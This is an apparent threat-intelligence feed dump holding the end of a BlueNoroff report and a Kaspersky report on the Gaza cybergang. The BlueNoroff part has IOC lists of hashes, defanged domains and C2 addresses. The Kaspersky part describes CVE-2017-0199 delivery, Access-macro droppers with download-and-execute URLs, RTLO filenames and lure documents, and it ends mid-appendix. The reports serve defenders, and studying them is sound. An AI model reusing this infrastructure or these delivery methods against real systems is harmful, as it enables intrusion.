cssvc.dll \nd8e51f1b9f78785ed7449145b705b2e4 cfssvc.dll \ndd2d50d2f088ba65a3751e555e0dea71 bfcsvc.dll \nf5317f1c0a10a80931378d68be9a4baa lssc.dll \n8727a967bbb5ebd99789f7414d147c31 sst.dll \ncab281b38a57524902afcb1c9c8aa5ba bnt.dll \n6a2cbaea7db300925d25d9decf461d95 lmsvc.dll \n33a60ea8859307d3fd1a1fe884e37d2d \n1993ebb00cb670c6e2ca9b5f6c6375c4 sessc.dll \n1fb48113d015466a272e4b70c3109e06 wssc.dll \n33ae39569f0051d8dc153d7b4e814a67 \n525345989e10b64cd4d0e144eb48171f \n724d11c2cae561225e7ed31d7517dd40 lsasvc.dll \n56df737f3028203db8d51ed1263160ad ocss.dll \na160b36426ce77bccdd32d117eeb879b csscv.dll \n8fa484d35e60b93a4128dc5de45ec0df wmmc.dll \n5cc93ccc91b2849df55d89b360fbae58 \n630ba28be4f55ea67225a3760f9e8c1f\n\n**Persistence Backdoor #1** \n2934a7a0dfaf2ebc81b1f089277129c4 Default.rdp \n6c97c64052dfdc457b001f84b8657435 Default.rdp \nbdc354506d6c018b52cb92a9d91f5f7c Default.rdp \n737478dbd1f66c9edb2d6c149432be26 Default.rdp \n5912e271b0da85ae3327d66deabf03ed Default.rdp \nd209c3da192c49cecb5a7b3d0f7154ac Default.rdp \n8d8f3a0d186b275e51589a694e09e884 Default.rdp \n7ccf3ddbdb175fcfece9c4423acf07b6 \n0a9b8ca2988208b876b74641c07f631e Default.rdp\n\n**Persistence Backdoor #2** \n9b30baa7873d86f985657c3e324ac431 vsat.dll \nae79ea7dfa81e95015bef839c2327108 ssdp.dll \nca9b98f17b9e24ca3f802c04eb508103 \n849dd9e09cc2434ee7dbdbf9e1c408b2 \n804523ecb9f7809fc2377d03b47dba22 \n2b7e434e52ff7480ae06ba901f8efbfd \n7129020312b85d5b1e760fc57b567d95 \nea9d8b81c9f85fd142639997187b447e \ne80f9d2fa735d7ab3bd9e954c4fcb6d0 \ne2ddf13340ba79b2635618e5675eea23 \n00a145e8f67a92b01ce4d85a0ed6bd77 \n73aed6bcf90f936f3fbcb389a133d7c8 \nff28ec14ec926b9892c61b9bf154a910 \n97e5c0fe8089da97665a22975e2c86de \nf60d7f620dc925c4e786bcf46856f4c8 \n4fbff7f0f62b26963b56c0fc23486891 \n4bb579d59830579be9ead9f74a55001e \naafc80ff2afc71b0d5abd6c8d2809e65 \n9850b24f8d70ad957f328961170e2d40 \n58495a2083065b36040eea288a9d5e17 \nf1cfd14b030e6b5d75e777ace530dad9 \n1fb25f72e4eb26b0df154de28dbff74c \n1b1acc7f27717905e7094f338f81db9f \n3776d4a24213972b54b9ed3360ac7883 \nc93f3bb4f7b19f5eb6f736f2659c4dae \n9084620e0219c035d60d395be1bf4cae \n2e38f37a23d9f00a02098dd302fc14e2\n\n**Domains** \nabiesvc[.]com \nabiesvc[.]info \nabiesvc.jp[.]net \natom.publicvm[.]com \natt.gdrvupload[.]xyz \nauthenticate.azure-drive[.]com \nazureprotect[.]xyz \nbackup.163qiye[.]top \nbeenos[.]biz \nbhomes[.]cc \nbitcoinnews.mefound[.]com \nbitflyer[.]team \nblog.cloudsecure[.]space \nbuidihub[.]com \nchemistryworld[.]us \ncirclecapital[.]us \nclient.googleapis[.]online \ncloud.azure-service[.]com \ncloud.globalbrains[.]co \ncloud.jumpshare[.]vip \ncloud.venturelabo[.]co \ncloudshare.jumpshare[.]vip \ncoin-squad[.]co \ncoinbig[.]dev \ncoinbigex[.]com \ndeepmind[.]fund \ndekryptcap[.]digital \ndllhost[.]xyz:5600 \ndoc.venturelabo[.]co \ndoc.youbicapital[.]cc \ndoconline[.]top \ndocs.azureword[.]com \ndocs.coinbigex[.]com \ndocs.gdriveshare[.]top \ndocs.goglesheet[.]com \ndocs.securedigitalmarkets[.]co \ndocstream[.]online \ndocument.antcapital[.]us \ndocument.bhomes[.]cc \ndocument.fastercapital[.]cc \ndocument.kraken-dev[.]com \ndocument.lundbergs[.]cc \ndocument.skandiafastigheter[.]cc \ndocumentprotect[.]live \ndocumentprotect[.]pro \ndocuments.antcapital[.]us \ndocuserver[.]xyz \ndomainhost.dynamic-dns[.]net \ndownload.azure-safe[.]com \ndownload.azure-service[.]com \ndownload.gdriveupload[.]site \ndrives.googldrive[.]xyz \ndrives.googlecloud[.]live \ndriveshare.googldrive[.]xyz \ndronefund[.]icu \ndrw[.]capital \neii[.]world \netherscan.mrslove[.]com \nfaq78.faqserv[.]com \nfastdown[.]site \nfastercapital[.]cc \nfile.venturelabo[.]co \nfilestream[.]download \nfoundico.mefound[.]com \ngalaxydigital[.]cc \ngalaxydigital[.]cloud \ngoogledrive[.]download \ngoogledrive[.]email \ngoogledrive[.]online \ngoogledrive.publicvm[.]com \ngoogleexplore[.]net \ngoogleservice[.]icu \ngoogleservice[.]xyz \ngsheet.gdocsdown[.]com \nhiccup[.]shop \ninnoenergy[.]info \nisosecurity[.]xyz \njack710[.]club \njumpshare[.]vip \nkraken-dev[.]com \nledgerservice.itsaol[.]com \nlemniscap[.]cc \nlundbergs[.]cc \nmail.gdriveupload[.]info \nmail.gmaildrive[.]site \nmail.googleupload[.]info \nmclland[.]com \nmicrostratgey[.]com \nmiss.outletalertsdaily[.]com \nmsoffice.qooqle[.]download \nnote.onedocshare[.]com \nonlinedocpage[.]org \npage.googledocpage[.]com \nproduct.onlinedoc[.]dev \nprotect.antcapital[.]us \nprotect.azure-drive[.]com \nprotect.venturelabo[.]co \nprotectoffice[.]club \npvset.itsaol[.]com \nqooqle[.]download \nqoqle[.]online \nregcnlab[.]com \nreit[.]live \nsecuredigitalmarkets[.]ca \nshare.bloomcloud[.]org \nshare.devprocloud[.]com \nshare.docuserver[.]xyz \nshare.stablemarket[.]org \nsharedocs[.]xyz \nsignverydn.sharebusiness[.]xyz \nsinovationventures[.]co \nskandiafastigheter[.]cc \nslot0.regcnlab[.]com \nsvr04.faqserv[.]com \ntokenhub.mefound[.]com \ntokentrack.mrbasic[.]com \ntwosigma.publicvm[.]com \nup.digifincx[.]com \nupcraft[.]io \nupdatepool[.]online \nupload.gdrives[.]best \nventurelabo[.]co \nverify.googleauth[.]pro \nword.azureword[.]com \nwww.googledocpage[.]com \nwww.googlesheetpage[.]org \nwww.onlinedocpage[.]org \nyoubicapital[.]cc\n\n**C2 address used by backdoor** \n118.70.116[.]154:8080 \n163.25.24[.]44 \n45.238.25[.]2 \ndevstar.dnsrd[.]com \nfxbet.linkpc[.]net \nlservs.linkpc[.]net \nmmsreceive.linkpc[.]net \nmmsreceive.linkpc[.]net \nmsservices.hxxps443[.]org \nonlineshoping.publicvm[.]com \npalconshop.linkpc[.]net \npokersonic.publicvm[.]com \npress.linkpc[.]net \nrubbishshop.linkpc[.]net \nrubbishshop.publicvm[.]com \nsocins.publicvm[.]com \nvpsfree.linkpc[.]net\n\n_Update: the domain cdn.discordapp.com was removed from the IOCs section because it is used by a legitimate service/application._", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-01-13T09:00:23", "type": "securelist", "title": "The BlueNoroff cryptocurrency hunt is still on", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2022-01-13T09:00:23", "id": "SECURELIST:CE9654E321FEC18D47DA16E0CF9D0CCE", "href": "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-30T17:33:15", "description": "![](https://securelist.com/files/2017/10/AdobeStock_132126943-990x400.jpeg)\n\n## 1\\. Summary information\n\nThe Gaza cybergang is an Arabic-language, politically-motivated cybercriminal group, operating since 2012 and actively targeting the MENA (Middle East North Africa) region. The Gaza cybergang's attacks have never slowed down and its typical targets include government entities/embassies, oil and gas, media/press, activists, politicians, and diplomats.\n\nOne of the interesting new facts, uncovered in mid-2017, is its discovery inside an oil and gas organization in the MENA region, infiltrating systems and pilfering data, apparently for more than a year.\n\nAnother interesting finding is the use of the recently discovered CVE 2017-0199 vulnerability, and Microsoft Access files into which the download scripts were embedded to reduce the likelihood of their detection. Traces of mobile malware that started to appear from late April 2017, are also being investigated.\n\nRecent targets for the group seem to be varied in nature; the attackers do not appear to be choosing targets selectively, but rather seeking different kinds of MENA intelligence.\n\nSome of the interesting new updates about the Gaza cybergang:\n\n * Gaza cybergang attackers have continued their interest in government entities in MENA\n * New targets identified include oil and gas in MENA\n * New tools and techniques include\n * Abuse of the CVE 2017-0199 vulnerability\n * Usage of macros inside Microsoft Access files, enabling lower detection rates\n * Possible Android mobile malware being used by attackers\n\n**Previous published research:** \n<https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/>\n\n**Kaspersky Lab products and services successfully detect and block Gaza cybergang attacks, detection names below:**\n\n * HEUR:Exploit.MSOffice.Generic\n * HEUR:Trojan.Win32.Cometer.gen\n * HEUR:Trojan.Win32.Generic\n * Trojan-Downloader.Win32.Downeks\n * Trojan-Spy.MSIL.Downeks\n * Win32.Bublik\n * Win32.Agentb\n\nMore information about Gaza cybergang is available to customers of the Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## 2\\. Technical details\n\nPreviously, Gaza cybergang attacks were surprisingly successful in using simple and common tools to achieve their goals. They relied on a variety of Remote Access Trojans (RATs) to perform their activities, including Downeks, Qasar, Cobaltstrike\u2026\n\nAs recently as June 2017, however, the attackers started using the CVE 2017-0199 vulnerability which enables direct code execution from a Microsoft office document on non-patched victim systems (Cobaltstrike payload in this case). Another finding is a possible Android Trojan that the attackers positioned on one of their command servers in April 2017.\n\nIn most cases, malware is sent by email as a compressed attachment or download links. Starting from March 2017, we have observed downloaders or Microsoft office documents with embedded macros being sent to victims. When opened, the downloader would contact a URL or IP address to retrieve the actual payload. Once successfully executed, the malware grants full access to the attackers, providing them with the ability to collect files, keystrokes and screenshots from victims' devices. If the initial downloaded malware was detected by the victim, the downloader would attempt to retrieve other malware files to the victim's device, in the hope that one of those files would work.\n\nThe full list of indicators of compromise (IOCs) can be found in Appendix I. The list of the most interesting lure content, malware files and related droppers, and command servers can be found in Appendix II.\n\n## 3\\. Summary of recent campaigns\n\nBelow can be found the list of recent findings related to Gaza cybergang operations:\n\n**Command and control server** | **Hash** | **First seen** | **File name/Social engineering lure** \n---|---|---|--- \n**upgrade.newshelpyou[.]com** | 552796e71f7ff304f91b39f5da46499b | 25-07-2017 | nvStView.exe \n| 6fba58b9f9496cc52e78379de9f7f24e | 23-03-2017 | \u0635\u0648\u0631 \u062e\u0627\u0635\u0629.exe \n(Translation: Special photos) \n| eb521caebcf03df561443194c37911a5 | 03-04-2017 | \u0635\u0648\u0631 \u062e\u0627\u0635\u0629.exe \n(Translation: Special photos) \n**moreoffer[.]life** | 66f144be4d4ef9c83bea528a4cd3baf3 | 27-05-2017 | \u062a\u0635\u0631\u064a\u062d \u0644\u0623\u0645\u064a\u0631 \u0642\u0637\u0631 \u0648\u0627\u062a\u0647\u0627\u0645 \u0627\u0644\u0625\u0645\u0627\u0631\u0627\u062a \u0641\u064a \u0627\u062e\u062a\u0631\u0627\u0642 \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0646\u0628\u0627\u0621.exe \n(Translation: A statement by the Emir of Qatar accusing the UAE of breaking the news agency) \n| 3ff60c100b67697163291690e0c2c2b7 | 11-05-2017 | MOM.InstallProxy.exe \n| b7390bc8c8a9a71a69ce4cc0c928153b | 05-04-2017 | \u062a\u0639\u0631\u0641 \u0639\u0644\u0649 \u0627\u0644\u0645\u0646\u0642\u0628\u0629 \u0627\u0644\u062a\u064a \u0623\u0633\u0627\u0621\u062a \u0644\u0644\u0633\u0639\u0648\u062f\u064a\u0629 \n(Translation: Learn about the woman wearing niqab which offended Saudi) \n| f43188accfb6923d62fe265d6d9c0940 | 21-03-2017 | Gcc-Ksa-uae.exe \n| 056d83c1c1b5f905d18b3c5d58ff5342 | 16-03-2017 | \u0645\u0631\u0627\u0633\u0644\u0629 \u0628\u062e\u0635\u0648\u0635 \u0627\u062c\u062a\u0645\u0627\u0639 \u0631\u0624\u0633\u0627\u0621 \u0627\u0644\u0628\u0639\u062b\u0627\u062a.exe \n(Translation: Correspondence regarding the meeting of Heads of Missions) \n**138.68.242[.]68** | 87a67371770fda4c2650564cbb00934d | 20-06-2017 | hamas.doc \n\u0646\u0642\u0627\u0637 \u0627\u062a\u0641\u0627\u0642 \u062d\u0645\u0627\u0633 \u0648\u062a\u064a\u0627\u0631 \u0641\u062a\u062d \u0627\u0644\u0627\u0635\u0644\u0627\u062d\u064a.doc (Translation: the points of agreement between Hamas and the reformist Fateh movement) \n\u0645\u062d\u0636\u0631 \u0627\u062c\u062a\u0645\u0627\u0639 \u0645\u0631\u0643\u0632\u064a\u0629 \u0641\u062a\u062d \u0627\u0644\u0644\u064a\u0644\u0629.doc (Translation: minutes of the tonight meeting) \n\u0633\u0644\u0641\u0629 \u0623\u0645 \u0631\u0627\u062a\u0628 \u0644\u0644\u0645\u0648\u0638\u0641\u064a\u0646 \u064a\u0648\u0645 \u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621 \u0627\u0644\u0645\u0642\u0628\u0644\u061f.doc (Translation: An advance on salary or full salary for employees next Tuesday?) \n**lol.mynetav[.]org** | 4f3b1a2088e473c7d2373849deb4536f | 20-06-2017 | Notepad.exe \nattachment.scr \nhttps://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU \n**signup.updatesforme[.]club** | 7d3426d8eb70e4486e803afb3eeac14f | 04-05-2017 | Palestinian Retirement Authority Ramallah.exe \n| 0ee4757ab9040a95e035a667457e4bc6 | 27-04-2017 | 27-4-2017 Fateh Gaza plo.exe \n**ping.topsite[.]life** | b68fcf8feb35a00362758fc0f92f7c2e | 19-03-2017 | Downloaded by Macro in MDB files: \nhttp://download.data-server.cloudns[.]club/indexer.exe \n| 7bef124131ffc2ef3db349b980e52847 | 13-03-2017 | \u0627\u0644\u0623\u062e \u0627\u0633\u0645\u0627\u0639\u064a\u0644 \u0647\u0646\u064a\u0629 -\u0646\u0627\u0626\u0628 \u0631\u0626\u064a\u0633 \u0627\u0644\u0645\u0643\u062a\u0628 \u0627\u0644\u0633\u064a\u0627\u0633\u064a .exe \n(Translation: Brother Ismail Haniyeh - Deputy Head of the Political Bureau) \n| d87c872869023911494305ef4acbd966 | 19-03-2017 | Downloaded by Macro in MDB files: http://download.data-server.cloudns[.]club/wordindexer.exe \n| a3de096598e3c9c8f3ab194edc4caa76 | 12-04-2017 | viewimages.exe \n| c078743eac33df15af2d9a4f24159500 | 28-03-2017 | viewimages.exe \n| 70d03e34cadb0f1e1bc6f4bf8486e4e8 | 30-03-2017 | download-file.duckdns[.]org/send/Egyptian_agreement_with_President_Mahmoud_Abbas.exe \n| 67f48fd24bae3e63b29edccc524f4096 | 17-04-2017 | http://alasra-paper.duckdns[.]org/send/\u0631\u0633\u0627\u0644\u0629_\u0648\u0641\u062f_\u0627\u0644\u0631\u0626\u064a\u0633 \u0627\u0628\u0648\u0645\u0627\u0632\u0646_\u0644\u062d\u0645\u0627\u0633_\u0641\u064a \u0642\u0637\u0627\u0639_\u063a\u0632\u0629.rar \n(Message from President Abu Mazen to Hamas in Gaza Strip) \n| 7b536c348a21c309605fa2cd2860a41d | 17-04-2017 | http://alasra-paper.duckdns[.]org/send/\u0648\u0631\u0642\u0629_\u0627\u0644\u0627\u0633\u0631\u0649_\u0627\u0644\u0645\u0642\u062f\u0645\u0629_\u0644\u0641\u0643_\u0627\u0644\u0627\u0636\u0631\u0627\u0628 .rar \n(Translation: captives paper submitted to stop the strike) \n**alasra-paper.duckdns[.]org** | Mobile malware N/A | 23-04-2017 | Possible Android malware. http://alasra-paper.duckdns[.]org/send/%D9%88%ket-Edition-1.04_ApkHouse.com/Dont-Starve-Pocket-Edition-1.04_ApkHouse.com.apk \n**hamas-wathaq.duckdns[.]org** | cf9d89061917e9f48481db80e674f0e9 | 16-04-2017 | \u0648\u062b\u0627\u0626\u0642 \u062a\u0646\u0634\u0631 \u0644\u0623\u0648\u0644 \u0645\u0631\u0647 \u0639\u0646 \u062d\u0643\u0645 \u062d\u0645\u0627\u0633 \u0644\u0642\u0637\u0627\u0639 \u063a\u0632\u0647 .exe \n(Translation: Documents published for the first time on Hamas ruling of Gaza Strip) \n**manual.newphoneapp[.]com** | 86a89693a273d6962825cf1846c3b6ce | 02-02-2017 | SQLiteDatabaseBrowserPortable.exe \n| 3f67231f30fa742138e713085e1279a6 | 02-02-2017 | SQLiteDatabaseBrowserPortable.exe \n \nThe above listed files are further described in Appendix 1.\n\n## 4\\. New findings\n\nGaza Cybergang attackers have been continuously evolving their skills on different levels, using new methods and techniques to deliver malware, in addition to adapting social engineering decoys to regional political and humanitarian incidents.\n\nIn mid-2017, the attackers were discovered inside an oil and gas organization in the MENA region, infiltrating systems and pilfering data, apparently for more than a year. The malware files that were found had been reported previously: <https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/>\n\nWhile traces of Android mobile malware have been spotted, attackers have continuously used the Downeks downloader and the Quasar or Cobaltstrike RATs to target Windows devices, enabling them to obtain remote access spying and data exfiltration abilities. This is now achieved more efficiently using the CVE 2017-0199 vulnerability which enables direct code execution abilities from a Microsoft office document on non-patched victim Windows systems. The use of Microsoft Access database files has also enabled the attackers to maintain low levels of detection, as it's not an uncommon method to deliver malware.\n\nThese developments have helped the attackers continue their operations, targeting a variety of victims and organizations, sometimes even bypassing defences and persisting for prolonged periods.\n\n### 4.1. The extended use of humanitarian and political causes in social engineering attacks\n\nAttackers have continuously targeted victims and organizations in government entities/embassies, oil and gas, media/press, activists, politicians, and diplomats.\n\nThe Gaza cybergang relies increasingly on advanced and up-to-date social engineering techniques with political and humanitarian aspects that directly reflect regional incidents. Here is a short list of incidents that were each used multiple times:\n\n * Palestinian Government not paying salaries to Gaza employees\n * Palestinian prisoners' hunger strike in Israeli jails\n * The political crisis in Qatar\n\nRecent targets for the group seem to be varied in nature, the attackers do not appear to be choosing targets selectively, but rather seeking any type of intelligence.\n\n#### 4.1.1. Example lure\n\nMD5: 66f144be4d4ef9c83bea528a4cd3baf3\n\n\u062a\u0635\u0631\u064a\u062d \u0644\u0623\u0645\u064a\u0631 \u0642\u0637\u0631 \u0648\u0627\u062a\u0647\u0627\u0645 \u0627\u0644\u0625\u0645\u0627\u0631\u0627\u062a \u0641\u064a \u0627\u062e\u062a\u0631\u0627\u0642 \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0646\u0628\u0627\u0621.exe\n\n(Translation: A statement by the Emir of Qatar accusing the UAE of breaking the news agency)\n\nAttackers have recently used political events related to the Qatar political crisis in the Middle East in targeting their victims.\n\nOriginal filename: Qatar-27-5-2017.rar\n\nExtracts to 66f144be4d4ef9c83bea528a4cd3baf3\n\n\u062a\u0635\u0631\u064a\u062d \u0644\u0623\u0645\u064a\u0631 \u0642\u0637\u0631 \u0648\u0627\u062a\u0647\u0627\u0645 \u0627\u0644\u0625\u0645\u0627\u0631\u0627\u062a \u0641\u064a \u0627\u062e\u062a\u0631\u0627\u0642 \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0646\u0628\u0627\u0621.exe\n\nSha256 7fcac2f18a8844e4af9f923891cfb6f637a99195a457b6cdb916926d709c6a04\n\n**C2: moreoffer[.]life**\n\n**First seen: 27 May 2017**\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-1.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-1.png>)\n\n \nTranslation: new details on the hack of the Qatar News Agency\n\n### 4.2. The use of Microsoft Access files with macros\n\nMicrosoft Access files with macro is another new development by the attacker group. MS Access database-embedded macros are proving to have very low detection rates.\n\nMD5: 6d6f34f7cfcb64e44d67638a2f33d619\n\nFilename: GAZA2017.mdb\n\nC1: http://download.data-server.cloudns[.]club/GAZA2017.mdb\n\n**Downloads and executes:**\n\n * data-server.cloudns[.]club/wordindexer.exe\n * data-server.cloudns[.]club/indexer.exe\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-2.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-2.png>)\n\n \nTranslation: database of employees not receiving salaries, click \"enable content\" to see data\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-3.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-3.png>)\n\n \nDecrypted code\n\n### 4.3. Exploitation of the CVE 2017-0199 vulnerability\n\nMD5: 87a67371770fda4c2650564cbb00934d\n\nFirst seen: 20-06-2017\n\nFilenames:\n\n * doc\n * \u0646\u0642\u0627\u0637 \u0627\u062a\u0641\u0627\u0642 \u062d\u0645\u0627\u0633 \u0648\u062a\u064a\u0627\u0631 \u0641\u062a\u062d \u0627\u0644\u0627\u0635\u0644\u0627\u062d\u064a.doc (Translation: the points of agreement between Hamas and the reforment Fateh movement)\n * \u0645\u062d\u0636\u0631 \u0627\u062c\u062a\u0645\u0627\u0639 \u0645\u0631\u0643\u0632\u064a\u0629 \u0641\u062a\u062d \u0627\u0644\u0644\u064a\u0644\u0629.doc (Translation: minutes of the tonight Fateh meeting)\n * \u0633\u0644\u0641\u0629 \u0623\u0645 \u0631\u0627\u062a\u0628 \u0644\u0644\u0645\u0648\u0638\u0641\u064a\u0646 \u064a\u0648\u0645 \u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621 \u0627\u0644\u0645\u0642\u0628\u0644\u061f.doc (Translation: An advance on salary or full salary for employees next Tuesday?)\n\nThe attacks are a typical exploitation of CVE-2017-0199, starting with an email that distributes a malicious RTF document. The vulnerability is in the code that handles Ole2Link embedded objects, which allows Microsoft Office Word to run remote files, downloaded in this case from 138.68.242[.]68. The downloaded payload is Cobaltstrike, which then connects to lol.mynetav[.]org to receive commands from the attackers. Additional details on the Gaza cybergang's use of CVE 2017-0199 with Cobaltstrike, can be found here: <http://bobao.360.cn/learning/detail/4193.html>\n\n### 4.4. Possible Android mobile malware\n\nTraces of APK files have been seen on one of the attackers' command centers, starting from 23-04-2017.\n\nURL: http://alasra-paper.duckdns[.]org/send/%D9%88%ket-Edition-1.04_ApkHouse[.]com/Dont-Starve-Pocket-Edition-1.04_ApkHouse[.]com.apk\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-4.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-4.png>)\n\nThe file name (Dont-Starve-Pocket-Edition-1.04_ApkHouse[.]com.apk), is an Android application file hiding as a popular game. We believe the android Trojan could be related to a previously investigated Android Trojan around the Gaza strip: <https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/>\n\n## 5\\. Conclusion\n\nThe Gaza Cybergang has demonstrated a large number of attacks and advanced social engineering, in addition to active development of attacks, infrastructure and the utilization of new methods and techniques. Attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near term, both in terms of quality and quantity.\n\nIn order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:\n\n * Educate staff to be able to distinguish spear-phishing emails or a phishing link from legitimate emails and links\n * Use proven corporate grade security solution in combination with anti-targeted attacks solutions capable of catching attacks by analyzing network anomalies\n * Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attacks prevention and discovery, such as indicators of compromise and YARA rules\n * Make sure enterprise grade patch management processes are well established and executed.\n\nMore information about Gaza cybergang is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## 6\\. Appendix 1: malware files description and decoys\n\nIn the following, we list the description of malware files found from March 2017, including decoys used, first dates files seen, parent files\u2026\n\n### 6.1. b7390bc8c8a9a71a69ce4cc0c928153b\n\nParent file: 970e6188561d6c5811a8f99075888d5f 5-4-2017.zip\n\nC2: moreoffer[.]life\n\nFirst seen: 5 April 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-5.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-5.png>)\n\n \nTranslation: Get to know the women wearing niqab and talking bad about the kingdom\n\n### 6.2. f43188accfb6923d62fe265d6d9c0940\n\nFilename: Gcc-Ksa-uae.exe\n\nC2: moreoffer[.]life (185.11.146[.]68)\n\nFirst Seen: 21 March 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-6.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-6.png>)\n\n \nTranslation: the permanent delegation of the cooperation council for the Arab states of the Gulf (GCC) to the United Nation and other international organizations, Geneva\n\n### 6.3. 056d83c1c1b5f905d18b3c5d58ff5342\n\n\u0645\u0631\u0627\u0633\u0644\u0629 \u0628\u062e\u0635\u0648\u0635 \u0627\u062c\u062a\u0645\u0627\u0639 \u0631\u0624\u0633\u0627\u0621 \u0627\u0644\u0628\u0639\u062b\u0627\u062a.Filename: exe\n\nTranslation: Correspondence regarding the meeting of Heads of Missions (Saudi related)\n\nParent file: fb549e0c2fffd390ee7c4538ff30ac3e\n\nC2: moreoffer[.]life\n\nFirst Seen: 16 March 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-7.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-7.png>)\n\n \nTranslation: The fourth foreign meeting of the Kingdom's head of missions under the title \"message of the embassador\".\n\n### 6.4. 0ee4757ab9040a95e035a667457e4bc6\n\nFilename: 27-4-2017 Fateh Gaza plo.exe\n\nC2: signup.updatesforme[.]club\n\nFirst seen 27 April 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-8.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-8.png>)\n\n \nTranslation: Clarification report\n\n### 6.5. 7bef124131ffc2ef3db349b980e52847\n\n\u0627\u0644\u0623\u062e \u0627\u0633\u0645\u0627\u0639\u064a\u0644 \u0647\u0646\u064a\u0629 -\u0646\u0627\u0626\u0628 \u0631\u0626\u064a\u0633 \u0627\u0644\u0645\u0643\u062a\u0628 \u0627\u0644\u0633\u064a\u0627\u0633\u064a .exe\n\n(Translation: Brother Ismail Haniyah - Deputy Head of the Political Bureau)\n\nC2: ping.topsite[.]life\n\nFirst seen: 14 March 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-9.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-9.png>)\n\n \nTranslation: Brother Ismail Haniyah - Deputy Head of the Political Bureau\n\n### 6.6. 70d03e34cadb0f1e1bc6f4bf8486e4e8\n\ndownload-file.duckdns[.]org/send/Egyptian_agreement_with_President_Mahmoud_Abbas.exe\n\nC1: download-file.duckdns[.]org\n\nC2: ping.topsite[.]life\n\nFirst seen: 30 March 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-10.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-10.png>)\n\n \nTranslation: methods to apply the palestinian national agreement pact.\n\n### 6.7. 67f48fd24bae3e63b29edccc524f4096\n\nC1: http://alasra-paper.duckdns[.]org/send/\u0631\u0633\u0627\u0644\u0629_\u0648\u0641\u062f_\u0627\u0644\u0631\u0626\u064a\u0633 \u0627\u0628\u0648\u0645\u0627\u0632\u0646_\u0644\u062d\u0645\u0627\u0633_\u0641\u064a \u0642\u0637\u0627\u0639_\u063a\u0632\u0629.rar\n\nC2: ping.topsite[.]life\n\nRAR extracts to: 5d74487ea96301a933209de3d145105d\n\n\u0631\u0633\u0627\u0644\u0629_\u0648\u0641\u062f_\u0627\u0644\u0631\u064a\u0654\u064a\u0633 \u0627\u0628\u0648\u0645\u0627\u0632\u0646_\u0644\u062d\u0645\u0627\u0633_\u0641\u064a \u0642\u0637\u0627\u0639_\u063a\u0632\u0629.exe\n\nFirst seen: 17 April 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-11.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-11.png>)\n\n \nTranslation: a severely threatening message from Abbas's delegation to Hamas\n\n### 6.8. 7b536c348a21c309605fa2cd2860a41d\n\nC1: http://alasra-paper.duckdns[.]org/send/\u0648\u0631\u0642\u0629_\u0627\u0644\u0627\u0633\u0631\u0649_\u0627\u0644\u0645\u0642\u062f\u0645\u0629_\u0644\u0641\u0643_\u0627\u0644\u0627\u0636\u0631\u0627\u0628 .rar\n\nExtracts to: d973135041fd26afea926e51ce141198, named (RTLO technique):\n\n\u0648\u0631\u0642\u0629 \u0627\u0644\u0627\u0633\u0631\u0649 \u0627\u0644\u0645\u0642\u062f\u0645\u0629 \u0644\u0641\u0643 \u0627\u0644\u0627\u0636\u0631\u0627\u0628 .exe\n\nTranslation: captives paper submitted to stop the strike\n\nC2:ping.topsite[.]life\n\nFirst seen: 17 April 